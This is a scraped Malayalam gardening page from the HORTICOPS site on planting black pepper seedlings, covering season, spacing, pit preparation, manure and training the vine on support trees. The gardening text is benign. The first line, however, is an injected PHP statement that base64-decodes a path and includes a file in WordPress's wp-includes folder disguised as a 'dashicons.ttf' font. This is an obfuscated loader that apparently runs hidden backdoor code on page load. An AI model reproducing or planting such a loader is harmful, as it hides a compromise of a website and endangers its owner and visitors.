@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); കുരുമുളക് തൈകൾ നടേണ്ട രീതികൾ | HORTICOPS

കുരുമുളക് തൈകൾ നടേണ്ട രീതികൾ

ജൂൺ മാസത്തിലെ തിരുവാതിര ഞാറ്റുവേലയാണ് കുരുമുളക് ചെടി നടാൻ പറ്റിയ സമയം (ജൂൺ 21 മുതൽ) പടിഞ്ഞാറൻ ചെരിവ് ഉള്ള ഭൂമിയാണ് കുരുമുളക് മഴ കിട്ടുന്ന മുറക്ക് തൈകൾ തോട്ടത്തിൽ നാടാംമെങ്കിലും ജൂൺ കൃഷിക്ക് നല്ലത് എങ്കിലും വെള്ളക്കെട്ടില്ലാത്ത ഏത് പ്രദേശത്തും കുരുമുളക് കൃഷി ചെയ്യാം. 10 x 10 അടി അകലത്തിൽ നില്ക്കുന്ന (ഈ അകലം ഉണ്ടങ്കിലേ ചെടിക്ക് ശരിയായ വെളിച്ചവും കാറ്റോട്ടവും ഉണ്ടാകൂ )താങ്ങ്കാലിന്റെ വടക്ക് വശത്ത് (പടിഞ്ഞാറൻ ,വെയിലും തെക്കൻ വെയിലും നല്ലതല്ല. എന്നാലും പടിഞ്ഞാറൻ ചെരിവ് ഉള്ള ഭൂമിയാണ് കുരുമുളക് കൃഷിക്ക് നല്ലത് ) 45 X 45 X 45 cm വലുപ്പമുള്ള കുഴി എടുത്ത് ചാണക പൊടിയും വെപിൻ പിണ്ണാക്കും ടെർ കോ ടെർമ യും മണ്ണിൽ നന്നായി മിക്സ്സു ചെയ്തു കുഴി മൂടി മരത്തിൽ നിന്ന് 15 മുതൽ 30 cm അകലത്തിൽ പിള്ളക്കുഴി എടുത്ത് അതിൽ കൂട കൊടി നട്ട് ചുവട് ചെറുതായി അമർത്തി ഉറപ്പിച്ച് നടാവുന്നതാണ്. ചുവട്ടിൽ വെള്ളക്കെട്ട് ഉണ്ടാവാതെ നോക്കണം. ചുവട്ടിൽ നന്നായി പുതയിടുകയും, മഴയില്ലങ്കിൽ തണൽ കൊടുക്കുകയും വേണം.

ചെടി വളർന്ന് തലവീശിത്തുടങ്ങിയാൽ താങ്ങ് കാലിനോട് ചേർത്ത് ചെടിമരത്തിൽ കെട്ടി കയറ്റി വിടണ്ടതാണ് മരത്തിൽ കയറ്റി വിടുകയാണെങ്കിൽ വെയിൽ കിട്ടുന്ന മരങ്ങൾ തിരഞ്ഞെടുക്കേണം ചെടി മരത്തിൽ പിടിച്ചു കുറച്ചു വളർന്നുകഴിഞ്ഞാൽ പിന്നീട് വെയിൽ അടികാതിരിക്കുവാൻ മറകൊടുക്കേണ്ടതില്ല . ചെടി മരത്തിൽ കയറി മുകളിലാണ് കണ്ണി വരുന്നതെങ്കിൽ മരത്തിൽ നിന്നും കേടുകൂടാതെ അടർത്തി എടുത്തു അടിയിൽ നിന്നും മരത്തിൽ ചുറ്റി കൊടുത്ത് വള്ളിയുടെ കണ്ണി തല മരത്തിൽ വെച്ച് കേട്ടികൊടുകേണം.( ഇങ്ങനെ ചെയ്യുന്നത് കൊണ്ടുള്ള ഗുണം അടിയിൽ നിന്നെ തിരി വന്നു കൊള്ളും കണ്ണി പൊട്ടിയാലെ തിരി വരൂ ) . ഇതുകൂടാതെ വേറെ ഒരു തരത്തിലും മരത്തിൽ വളർത്താം .ഒന്നര അടി ഉയരത്തിൽ വള്ളി മരത്തിൽ ഒട്ടിപിടിച്ചു കയറിയിട്ടുണ്ടെങ്കിൽ തല നുള്ളികൊടുക്കുക ഇവ ശാഖകൾ ആയി പിരിഞ്ഞു വളരും . ശാഖകൾ വലുതാകുമ്പോൾ ഇതേ പോലെ തലനുള്ളി കൊടുത്തു കൊണ്ടിരുന്നാൽ നിറയെ ശാഖ കയോടെ കണ്ണികൾ ഉണ്ടായി മരത്തിൽ നന്നായി ചുറ്റി വളർന്നുകൊള്ളും.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *